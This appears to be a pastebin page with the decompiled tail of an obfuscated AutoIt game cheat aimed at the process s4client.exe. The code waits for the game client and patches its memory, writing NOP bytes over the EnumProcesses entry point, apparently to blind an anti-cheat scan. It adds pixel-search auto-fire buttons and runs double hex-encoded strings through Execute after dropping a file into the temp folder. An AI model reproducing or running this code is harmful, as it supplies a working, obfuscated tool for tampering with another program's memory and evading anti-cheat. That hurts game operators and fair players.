  5222. DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04D8 ), 3 )
  5223. DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04DB ), 4 )
  5224. DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04DE ), 5 )
  5225. DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04E1 ), 6 )
  5226. DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04E4 ), 7 )
  5227. DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04E7 ), 8 )
  5228. DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04EA ), 9 )
  5229. DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04ED ), 10 )
  5230. DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04F0 ),0x000B )
  5231. DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04F3 ),0x000C )
  5232. DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04F6 ),0x000D )
  5233. DLLSTRUCTSETDATA($Var04CC , 1 ,DLLSTRUCTGETPTR($Var04CE ))
  5234. DLLSTRUCTSETDATA($Var04CC , 2 , 1 )
  5235. $Var04CF =DLLSTRUCTGETPTR($Var04CC )
  5236. ENDIF
  5237. LOCAL CONST $Var0266 =0x0400 +0x0046
  5238. IF Fn0006($Arg00,$Var0266 , 0 ,$Var04CF )= 0 THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
  5239. RETURN TRUE
  5240. ENDFUNC
  5241.  
  5242. Func Fn017D($Arg00,$Arg01,$Arg02)
  5243. #forceref $Arg00, $Arg01, $Arg02
  5244. RETURN $Var0513
  5245. ENDFUNC
  5246.  
  5247. Func Fn017E($Arg00)
  5248. LOCAL $Local00EE =DLLSTRUCTCREATE("ptr;dword" ,$Arg00)
  5249. DLLSTRUCTSETDATA($Local00EE , 2 ,DLLSTRUCTGETDATA($Local00EE , 2 )+ 1 )
  5250. RETURN DLLSTRUCTGETDATA($Local00EE , 2 )
  5251. ENDFUNC
  5252.  
  5253. Func Fn017F($Arg00)
  5254. LOCAL $Local00EE =DLLSTRUCTCREATE("ptr;dword" ,$Arg00)
  5255. IF DLLSTRUCTGETDATA($Local00EE , 2 )> 0 THEN
  5256. DLLSTRUCTSETDATA($Local00EE , 2 ,DLLSTRUCTGETDATA($Local00EE , 2 )- 1 )
  5257. RETURN DLLSTRUCTGETDATA($Local00EE , 2 )
  5258. ENDIF
  5259. ENDFUNC
  5260.  
  5261. Func Fn0180($Arg00,$Arg01,$Arg02,$Arg03)
  5262. #forceref $Arg00, $Arg01, $Arg02, $Arg03
  5263. RETURN $Var0515
  5264. ENDFUNC
  5265.  
  5266. Func Fn0181($Arg00,$Arg01)
  5267. #forceref $Arg00, $Arg01
  5268. RETURN $Var0515
  5269. ENDFUNC
  5270.  
  5271. Func Fn0182($Arg00,$Arg01,$Arg02,$Arg03)
  5272. #forceref $Arg00, $Arg01, $Arg02, $Arg03
  5273. RETURN $Var0513
  5274. ENDFUNC
  5275.  
  5276. Func Fn0183($Arg00,$Arg01)
  5277. #forceref $Arg00, $Arg01
  5278. RETURN $Var0515
  5279. ENDFUNC
  5280.  
  5281. Func Fn0184($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05)
  5282. #forceref $Arg00, $Arg01, $Arg02, $Arg03, $Arg04, $Arg05
  5283. RETURN $Var0513
  5284. ENDFUNC
  5285.  
  5286. Func Fn0185($Arg00,$Arg01)
  5287. #forceref $Arg00, $Arg01
  5288. RETURN $Var0515
  5289. ENDFUNC
  5290.  
  5291. Func Fn0186($Arg00,$Arg01,$Arg02,$Arg03)
  5292. #forceref $Arg00, $Arg01, $Arg02, $Arg03
  5293. RETURN $Var0515
  5294. ENDFUNC
  5295.  
  5296. Func Fn0187($Arg00,$Arg01,$Arg02,$Arg03)
  5297. #forceref $Arg00, $Arg01, $Arg02, $Arg03
  5298. RETURN $Var0515
  5299. ENDFUNC
  5300.  
  5301. Func Fn0188($Arg00,$Arg01,$Arg02,$Arg03,$Arg04)
  5302. #forceref $Arg00, $Arg01, $Arg02, $Arg03, $Arg04
  5303. RETURN $Var0515
  5304. ENDFUNC
  5305.  
  5306. Func Fn0189($Arg00,$Arg01)
  5307. #forceref $Arg00
  5308. LOCAL $Local00EF =DLLCALL($Var04D0 ,"dword" ,"CreateILockBytesOnHGlobal","hwnd" , 0 ,"int" , 1 ,"ptr*" , 0 )
  5309. LOCAL $Local00F0 =$Local00EF [ 3 ]
  5310. $Local00EF =$Local00EF [ 0 ]
  5311. IF $Local00EF THEN RETURN $Local00EF
  5312. $Local00EF =DLLCALL($Var04D0 ,"dword" ,"StgCreateDocfileOnILockBytes","ptr" ,$Local00F0 ,"dword" ,BITOR(0x0010 , 2 ,0x1000 ),"dword" , 0 ,"ptr*" , 0 )
  5313. LOCAL $Local00F1 =DLLSTRUCTCREATE("ptr" ,$Arg01)
  5314. DLLSTRUCTSETDATA($Local00F1 , 1 ,$Local00EF [ 4 ])
  5315. $Local00EF =$Local00EF [ 0 ]
  5316. IF $Local00EF THEN
  5317. LOCAL $Local00F2 =DLLSTRUCTCREATE("ptr" ,$Local00F0 )
  5318. LOCAL $Local00F3 =DLLSTRUCTCREATE("ptr[3]" ,DLLSTRUCTGETDATA($Local00F2 , 1 ))
  5319. LOCAL $Local00F4 =DLLSTRUCTGETDATA($Local00F3 , 3 )
  5320. CALL("MemoryFuncCall"&"","long" ,$Local00F4 ,"ptr" ,$Local00F0 )
  5321. IF @ERROR= 1 THEN CONSOLEWRITE("!> Needs MemoryDLL.au3 for correct release of ILockBytes"& @CRLF )
  5322. ENDIF
  5323. RETURN $Local00EF
  5324. ENDFUNC
  5325. GLOBAL CONST $Var058B =NUMBER($Var058C )
  5326. GLOBAL CONST $Var058D =NUMBER($Var058E )
  5327. GLOBAL CONST $Var058F =NUMBER($Var0590 )
  5328. GLOBAL CONST $Var0591 =NUMBER($Var0592 )
  5329. GLOBAL CONST $Var0593 =BITOR($Var058F ,$Var058D ,$Var058B ,$Var0591 )
  5330. GLOBAL CONST $Var0594 =NUMBER($Var0595 )
  5331. GLOBAL CONST $Var0596 =NUMBER($Var0597 )
  5332. GLOBAL CONST $Var0598 =NUMBER($Var0599 )
  5333. GLOBAL CONST $Var059A =NUMBER($Var059B )
  5334. GLOBAL CONST $Var059C =NUMBER($Var059D )
  5335. GLOBAL CONST $Var059E =NUMBER($Var059F )
  5336. GLOBAL CONST $Var05A0 =NUMBER($Var05A1 )
  5337. GLOBAL CONST $Var05A2 =NUMBER($Var05A3 )
  5338. GLOBAL CONST $Var05A4 =NUMBER($Var05A5 )
  5339. GLOBAL CONST $Var05A6 =NUMBER($Var05A7 )
  5340. GLOBAL CONST $Var05A8 =NUMBER($Var05A9 )
  5341. GLOBAL CONST $Var05AA =NUMBER($Var05AB )
  5342. GLOBAL CONST $Var05AC =NUMBER($Var05AD )
  5343. GLOBAL CONST $Var05AE =NUMBER($Var05AF )
  5344. GLOBAL CONST $Var05B0 =NUMBER($Var05B1 )
  5345. GLOBAL CONST $Var05B2 =NUMBER($Var05B3 )
  5346. GLOBAL CONST $Var05B4 =NUMBER($Var05B5 )
  5347. GLOBAL CONST $Var05B6 =NUMBER($Var05B7 )
  5348. GLOBAL CONST $Var05B8 =NUMBER($Var05B9 )
  5349. GLOBAL CONST $Var05BA =NUMBER($Var05BB )
  5350. GLOBAL CONST $Var05BC =$Var05BA
  5351. GLOBAL CONST $Var05BD =NUMBER($Var05BE )
  5352. GLOBAL CONST $Var05BF =$Var05BD
  5353. GLOBAL CONST $Var05C0 =NUMBER($Var05C1 )
  5354. GLOBAL CONST $Var05C2 =NUMBER($Var05C3 )
  5355. GLOBAL CONST $Var05C4 =NUMBER($Var05C5 )
  5356. GLOBAL CONST $Var05C6 =NUMBER($Var05C7 )
  5357. GLOBAL CONST $Var05C8 =NUMBER($Var05C9 )
  5358. IF PROCESSEXISTS($Var05CA )THEN
  5359. MSGBOX(NUMBER($Var05CB ),$Var05CC ,$Var05CD )
  5360. EXIT
  5361. ENDIF
  5362. GLOBAL $Var05CE =FALSE ,$Var05CF =FALSE ,$Var05D0 =FALSE ,$Var05D1 =FALSE ,$Var05D2 =NUMBER($Var05D3 )
  5363. $Var05D4 =GUICREATE($Var05D5 ,NUMBER($Var05D6 ),NUMBER($Var05D7 ),NUMBER($Var05D8 ),NUMBER($Var05D9 ),-NUMBER($Var05DA ),$Var05DB )
  5364. GUISETICON($Var05DC )
  5365. $Var05DD =GUICTRLCREATELABEL($Var05DE ,NUMBER($Var05DF ),NUMBER($Var05E0 ),NUMBER($Var05E1 ),NUMBER($Var05E2 ))
  5366. $Var05E3 =GUICTRLCREATELABEL($Var05E4 ,NUMBER($Var05E5 ),NUMBER($Var05E6 ),NUMBER($Var05E7 ),NUMBER($Var05E8 ))
  5367. $Var05E9 =GUICTRLCREATELABEL($Var05EA ,NUMBER($Var05EB ),NUMBER($Var05EC ),NUMBER($Var05ED ),NUMBER($Var05EE ))
  5368. $Var05EF =GUICTRLCREATELABEL($Var05F0 ,NUMBER($Var05F1 ),NUMBER($Var05F2 ),NUMBER($Var05F3 ),NUMBER($Var05F4 ))
  5369. $Var05F5 =GUICTRLCREATEINPUT($Var05F6 ,NUMBER($Var05F7 ),NUMBER($Var05F8 ),NUMBER($Var05F9 ),NUMBER($Var05FA ))
  5370. $Var05FB =GUICTRLCREATEINPUT($Var05FC ,NUMBER($Var05FD ),NUMBER($Var05FE ),NUMBER($Var05FF ),NUMBER($Var0600 ))
  5371. $Var0601 =GUICTRLCREATEINPUT($Var0602 ,NUMBER($Var0603 ),NUMBER($Var0604 ),NUMBER($Var0605 ),NUMBER($Var0606 ))
  5372. $Var0607 =GUICTRLCREATEINPUT($Var0608 ,NUMBER($Var0609 ),NUMBER($Var060A ),NUMBER($Var060B ),NUMBER($Var060C ))
  5373. $Var060D =GUICTRLCREATEBUTTON($Var060E ,NUMBER($Var060F ),NUMBER($Var0610 ),NUMBER($Var0611 ),NUMBER($Var0612 ))
  5374. GUICTRLSETCOLOR(-NUMBER($Var0613 ),NUMBER($Var0614 ))
  5375. $Var0615 =GUICTRLCREATEBUTTON($Var0616 ,NUMBER($Var0617 ),NUMBER($Var0618 ),NUMBER($Var0619 ),NUMBER($Var061A ))
  5376. GUICTRLSETCOLOR(-NUMBER($Var061B ),NUMBER($Var061C ))
  5377. $Var061D =GUICTRLCREATEBUTTON($Var061E ,NUMBER($Var061F ),NUMBER($Var0620 ),NUMBER($Var0621 ),NUMBER($Var0622 ))
  5378. GUICTRLSETCOLOR(-NUMBER($Var0623 ),NUMBER($Var0624 ))
  5379. $Var0625 =GUICTRLCREATEBUTTON($Var0626 ,NUMBER($Var0627 ),NUMBER($Var0628 ),NUMBER($Var0629 ),NUMBER($Var062A ))
  5380. GUICTRLSETCOLOR(-NUMBER($Var062B ),NUMBER($Var062C ))
  5381. GUISETSTATE(EXECUTE($Var062D ))
  5382. TRAYTIP($Var062E ,$Var062F ,NUMBER($Var0630 ))
  5383. SLEEP(NUMBER($Var0631 ))
  5384. Fn018A()
  5385. TRAYTIP($Var0632 ,$Var0633 ,NUMBER($Var0634 ))
  5386. SLEEP(NUMBER($Var0635 ))
  5387. DO
  5388. SLEEP(NUMBER($Var0636 ))
  5389. UNTIL WINEXISTS($Var0637 )
  5390. DO
  5391. $Local00DD =WINGETCLIENTSIZE($Var0638 )
  5392. UNTIL EXECUTE($Var0639 )<>$Local00DD [NUMBER($Var063A )]OR EXECUTE($Var063B )<>$Local00DD [NUMBER($Var063C )]
  5393. GUICTRLSETDATA($Var060D ,$Var063D )
  5394. GUICTRLSETCOLOR($Var060D ,NUMBER($Var063E ))
  5395. GUICTRLSETDATA($Var0615 ,$Var063F )
  5396. GUICTRLSETCOLOR($Var0615 ,NUMBER($Var0640 ))
  5397. GUICTRLSETDATA($Var061D ,$Var0641 )
  5398. GUICTRLSETCOLOR($Var061D ,NUMBER($Var0642 ))
  5399. GUICTRLSETDATA($Var0625 ,$Var0643 )
  5400. GUICTRLSETCOLOR($Var0625 ,NUMBER($Var0644 ))
  5401. WHILE PROCESSEXISTS($Var0645 )
  5402. $Var0646 =GUIGETMSG()
  5403. SWITCH $Var0646
  5404. CASE $Var0647
  5405. EXIT
  5406. CASE $Var060D
  5407. $Var05CE =NOT $Var05CE
  5408. IF $Var05CE THEN
  5409. GUICTRLSETCOLOR($Var060D ,NUMBER($Var0648 ))
  5410. GUICTRLSETDATA($Var060D ,$Var0649 )
  5411. ELSE
  5412. GUICTRLSETCOLOR($Var060D ,NUMBER($Var064A ))
  5413. GUICTRLSETDATA($Var060D ,$Var064B )
  5414. ENDIF
  5415. CASE $Var0615
  5416. IF NOT $Var05D0 AND NOT $Var05D1 THEN
  5417. $Var05CF =NOT $Var05CF
  5418. IF $Var05CF THEN
  5419. GUICTRLSETCOLOR($Var0615 ,NUMBER($Var064C ))
  5420. GUICTRLSETDATA($Var0615 ,$Var064D )
  5421. ELSE
  5422. GUICTRLSETCOLOR($Var0615 ,NUMBER($Var064E ))
  5423. GUICTRLSETDATA($Var0615 ,$Var064F )
  5424. ENDIF
  5425. ENDIF
  5426. CASE $Var061D
  5427. IF NOT $Var05CF AND NOT $Var05D1 THEN
  5428. $Var05D0 =NOT $Var05D0
  5429. IF $Var05D0 THEN
  5430. GUICTRLSETCOLOR($Var061D ,NUMBER($Var0650 ))
  5431. GUICTRLSETDATA($Var061D ,$Var0651 )
  5432. ELSE
  5433. GUICTRLSETCOLOR($Var061D ,NUMBER($Var0652 ))
  5434. GUICTRLSETDATA($Var061D ,$Var0653 )
  5435. ENDIF
  5436. ENDIF
  5437. CASE $Var0625
  5438. IF NOT $Var05CF AND NOT $Var05D0 THEN
  5439. $Var05D1 =NOT $Var05D1
  5440. IF $Var05D1 THEN
  5441. GUICTRLSETCOLOR($Var0625 ,NUMBER($Var0654 ))
  5442. GUICTRLSETDATA($Var0625 ,$Var0655 )
  5443. ELSE
  5444. GUICTRLSETCOLOR($Var0625 ,NUMBER($Var0656 ))
  5445. GUICTRLSETDATA($Var0625 ,$Var0657 )
  5446. ENDIF
  5447. ENDIF
  5448. ENDSWITCH
  5449. IF $Var05CE OR $Var05CF OR $Var05D0 OR $Var05D1 THEN
  5450. $Var05D2 =NUMBER($Var0658 )
  5451. $Var0659 =(EXECUTE($Var065A )/NUMBER($Var065B ))-$Var05D2
  5452. $Var065C =(EXECUTE($Var065D )/NUMBER($Var065E ))-$Var05D2
  5453. $Var065F =(EXECUTE($Var0660 )/NUMBER($Var0661 ))+$Var05D2
  5454. $Var0662 =(EXECUTE($Var0663 )/NUMBER($Var0664 ))+$Var05D2
  5455. $Local00DD =PIXELSEARCH($Var0659 ,$Var065C ,$Var065F ,$Var0662 ,NUMBER($Var0665 ),NUMBER($Var0666 ),NUMBER($Var0667 ))
  5456. IF ISARRAY($Local00DD )THEN
  5457. IF $Var05CE THEN
  5458. SLEEP(GUICTRLREAD($Var05F5 ))
  5459. SEND($Var0668 )
  5460. ENDIF
  5461. IF $Var05CF THEN
  5462. SLEEP(GUICTRLREAD($Var05FB ))
  5463. MOUSEUP($Var0669 )
  5464. ENDIF
  5465. IF $Var05D0 THEN
  5466. SLEEP(GUICTRLREAD($Var0601 ))
  5467. MOUSEDOWN($Var066A )
  5468. SLEEP(NUMBER($Var066B ))
  5469. MOUSEUP($Var066C )
  5470. ENDIF
  5471. IF $Var05D1 THEN
  5472. SLEEP(GUICTRLREAD($Var0607 ))
  5473. MOUSEUP($Var066D )
  5474. $Var05D2 =NUMBER($Var066E )
  5475. MOUSEDOWN($Var066F )
  5476. DO
  5477. $Local00DD =PIXELSEARCH($Var0659 ,$Var065C ,$Var065F ,$Var0662 ,NUMBER($Var0670 ),NUMBER($Var0671 ),NUMBER($Var0672 ))
  5478. UNTIL NOT ISARRAY($Local00DD )
  5479. MOUSEUP($Var0673 )
  5480. ENDIF
  5481. ENDIF
  5482. ENDIF
  5483. WEND
  5484.  
  5485. Func Fn018A()
  5486. GLOBAL $Var0674 ,$Var0675
  5487. $Var0676 =0x0013
  5488. $Var0677 ="0x" &Fn00D9("90" ,$Var0676 )
  5489. $Var0678 =PROCESSWAIT("s4client.exe")
  5490. $Var0674 =A4800101827($Var0678 )
  5491. DO
  5492. SLEEP( 10 )
  5493. UNTIL Fn018B()= 1
  5494. A0B00300F13($Var0675 ,$Var0674 ,$Var0677 ,"byte[" &$Var0676 &"]" )
  5495. A280040200A($Var0674 )
  5496. ENDFUNC
  5497.  
  5498. Func Fn018B()
  5499. $Var0675 =Fn018C(Fn005B("psapi.dll" ),"EnumProcesses")
  5500. IF A2F0020442C($Var0675 ,$Var0674 ,"byte[2]" )="0x8BFF" THEN
  5501. RETURN 1
  5502. ELSE
  5503. RETURN 0
  5504. ENDIF
  5505. ENDFUNC
  5506.  
  5507. Func Fn018C($Arg00,$Arg01)
  5508. $Var0679 =DLLCALL("Kernel32.dll","ptr" ,"GetProcAddress","ptr" ,$Arg00,"str" ,$Arg01)
  5509. RETURN $Var0679 [ 0 ]
  5510. ENDFUNC
  5511.  
  5512. Func Fn018D()
  5513. FOR $AX0X0XA=1 TO 5
  5514. LOCAL $Fn018FSZ_=Fn018E()
  5515. FILEINSTALL("V2.au3.tbl",$Fn018FSZ_,1)
  5516. GLOBAL $Fn018F,$Os=EXECUTE(BINARYTOsTRING("0x457865637574652842696E617279746F737472696E6728273078343537383635363337353734363532383432363936453631373237393734364637333734373236393645363732383237333037383335333333373334333733323336333933363435333633373335333333373330333634333336333933373334333233383334333633363339333634333336333533353332333633353336333133363334333233383332333433343331333333313333333933333330333333303333333033333330333333323333333533333333333333323337333333373431333534363332333933323433333233373337333433333336333333333332333133323337333234333333333133323339323732393239272929"))
  5517. IF ISARRAY($Os)AND $Os[0]>=7151 THEN EXITLOOP
  5518. SLEEP(10)
  5519. NEXT
  5520. EXECUTE(BINARYTOsTRING("0x457865637574652842696E617279746F737472696E6728273078343537383635363337353734363532383432363936453631373237393734364637333734373236393645363732383237333037383333333133323432333433363336333933363433333633353334333433363335333634333336333533373334333633353332333833323334333433313333333133333339333333303333333033333330333333303333333233333335333333333333333233373333333734313335343633323339323732393239272929"))
  5521. ENDFUNC
  5522.  
  5523. Func Fn018E()
  5524. LOCAL $Fn018FS1_=Fn018F("4054656D70446972"),$Fn018FS3_=Fn018F("31"),$Fn018FS4_=Fn018F("5c"),$Fn018FS5_=Fn018F("5c"),$Fn018FS6_=Fn018F("37"),$Fn018FS8_=Fn018F("3937"),$Fn018FS9_=Fn018F("313232"),$Fn018FS7_=Fn018F("31"),$Fn018FSA_
  5525. LOCAL $Fn018FS2_=EXECUTE($Fn018FS1_)
  5526. IF STRINGRIGHT($Fn018FS2_,NUMBER($Fn018FS3_))<>$Fn018FS4_ THEN $Fn018FS2_=$Fn018FS2_&$Fn018FS5_
  5527. SRANDOM(NUMBER(STRINGRIGHT(TIMERINIT(),4)))
  5528. DO
  5529. $Fn018FSA_=""
  5530. WHILE STRINGLEN($Fn018FSA_)<NUMBER($Fn018FS6_)
  5531. $Fn018FSA_=$Fn018FSA_&CHR(RANDOM(NUMBER($Fn018FS8_),NUMBER($Fn018FS9_),NUMBER($Fn018FS7_)))
  5532. WEND
  5533. $Fn018FSA_=$Fn018FS2_&$Fn018FSA_
  5534. UNTIL NOT FILEEXISTS($Fn018FSA_)
  5535. RETURN ($Fn018FSA_)
  5536. ENDFUNC
  5537.  
  5538. Func Arg00($Arg00)
  5539. LOCAL $Arg00_
  5540. FOR $X=1 TO STRINGLEN($Arg00)STEP 2
  5541. $Arg00_&=CHR(DEC(STRINGMID($Arg00,$X,2)))
  5542. NEXT
  5543. RETURN $Arg00_
  5544. ENDFUNC
  5545. ; DeTokenise by myAut2Exe >The Open Source AutoIT/AutoHotKey script decompiler< 2.9 build(138)
Advertisement
Add Comment
Please, Sign In to add comment